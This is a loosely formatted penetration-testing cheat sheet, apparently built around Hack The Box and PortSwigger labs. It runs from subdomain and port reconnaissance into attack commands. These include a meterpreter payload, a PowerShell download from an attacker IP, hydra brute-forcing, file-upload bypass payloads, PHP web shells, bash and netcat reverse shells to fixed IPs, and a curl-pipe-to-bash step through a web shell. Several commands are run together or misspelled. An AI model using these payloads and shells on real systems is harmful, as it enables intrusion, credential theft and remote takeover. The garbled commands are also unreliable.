Recon phase
- Review latest [acquisitions](https://www.crunchbase.com/)
- Get relationships by registrants ([viewdns](https://viewdns.info/reversewhois/))
- Go to medium scope for each domain
ON Small Domain
- subfinder -d domainname.com |httpx | gau |uro | gf lfi | tee save-file.txt
DnsDump
Subdomain Enum
amassenum -d clicktheclapbutton50timesplz.comsublist3r-d techyrick.com -o file.txtsubfinder-d domain.com -all -silentassetfinderassetfindergobuster vhost-u http://thetoppers.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain //subdomainecho domain.com |
waybackurls| unfurl -u domainsgau--subs example.com | unfurl -u domains- crt.sh
Technologies
Content Discovery
crawley-all -cookie "security=low; PHPSESSID=mlhjkmo9l7slsf8g548pnd4pjn" http://localhost/dvwa > io.txtffuf-u http://URL/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -mc 200,302wfuzz-c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,302,301 http://10.129.206.31/FUZZ.phpgobuster dir-u http://url/ -w wordlists -x php,txt,js -k +{for ssl }dirsearch
Parameters
ffuf-w /path/to/paramnames.txt -u https://target/script.php?FUZZ=test_value -fs 4242ParmMainar(Burp)x8
sub-domain_takeover
subzy./subzy run --targets list.txtcan-i-take-over-xyz.git
==========================================AutomationAndCollected-Command==========================================
Curl
- curl -X OPTIONS -I
[allow HTTP Methods]
fuff
- ffuf -u http://URL/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -mc 200,302
- ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.11.23 -H "Host: FUZZ.permx.htb" -mc 200 -s
Wfuzz
- wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,302,301 http://10.129.206.31/FUZZ.php
gobuster [subdomain]
- gobuster vhost -u http://thetoppers.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain //subdomain
amass
- amass enum -d clicktheclapbutton50timesplz.com
sublist3r
- sublist3r -d techyrick.com -o file.txt
- sublist3r -d techyrick.com -b
nslookup
- $ nslookup example.com
- $ nslookup $ip$
- $ nslookup $ip$ $ip$
dig
- dig axfr cronos.htb @10.10.10.13
- dig -x 10.10.10.13 @10.10.10.13
zip2john
- zip2john your_file.zip > zip.hash
Whatweb
- whatweb http://URL -v
nmap
- nmap -sn 192.168.1.0/24 //scan networks
- nmap --top-ports 1000 $ip
- nmap -iL list.txt
- nmap -A -T4 cloudflare.co
- nmap -sV localhost
- nmap -p- -pn -vv -T4 -n $ip
- nmap --top-ports 100 -A -sV -T4 $ip
- sudo nmap -sSVC -p-10000 $ip$
rustscan || like nmap
- rustscan -a 10.129.184.36 --ulimit 5000 -- -A
tcpdump
- tcpduo -i tun0 port 1389
bettercap
- sudo bettercap
- net.probe on
- net.show
waybackurls
- cat program.txt | waybackurls >> urls.txt //For target scope
Impaket-server
- > sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
- ? copy \\10.21.28.143\kali\reverse.exe C:\PrivEsc\reverse.exe
nuclei
- cat program.txt | nuclei
password
- mkpasswd -m sha-512 Password1234
John the Ripper
- john --wordlists=/usr/share/wordlist/rockyou.txt john.txt
- john john.txt --show
Docker
- sudo ddocker run --rm -i $Container/Name$
Metasploit
- search type:exploit name:smb platform:windows
searchsploit
searchsploit -m %path/file%
Upload File on Victem
powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.105:8000/MS10-059.exe', 'MS10-059.exe')"
PayLoad
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=
hydra
hydra -l none -P rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64 -V
crackmapexec
- crackmapexec smb solarlab.htb -u blake -p pass.txt
wpscan
- wpscan --url example.com
HttpX
httpx-ssc -td -title -fhr -location -pa
FOR iiS USE shortscan
shortscanhttps://example.url.com/
Collect IP's
shodan.io
cencys,fofa,zommeye and all using
File_Permitions
chmod a+rx filename
sudo shown www-data: /file/pass/
file_uploadbypass
========================
Content-Disposition: form-data; name="avatar"; filename=".htaccess" Content-Type: text/plain
AddType application/x-httpd-php .tez
========================
Content-Type: image/jpeg
========================
exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ink.png -o polyglot.php
========================
test.php%00.jpg
========================
Lab: Web shell upload via race condition
========================
==========================================NOTE&TIPS==========================================
DOMAINS divide into ==> info,api,dev,admin,stage..
etc on Windows ==>
C:\Windows\System32\drivers\etc\passwdssh on windows ==>
C:\Users\YourUsername\.sshShell_UP ==>
python3 -c 'import pty;pty.spawn("/bin/bash")'Shell_UP ==>
script /dev/null -c bashshell.sh ==>
bash -c 'bash -i >& /dev/tcp/10.10.16.49/5555 0>&1'shell==>
?php system($_GET["cmd"]); ?>shell.php ==>
?php echo shell_exec($_GET['e'].' 2>&1'); ?>shell==>
nc -e /bin/bash 10.10.10.10 5555shell.sh==>
#!/bin/bash
bash -i >& /dev/tcp/10.21.28.143/5555 0>&1
THEN==>
http://site.htb/shell.php?cmd=curl%20:8000/shell.sh|bash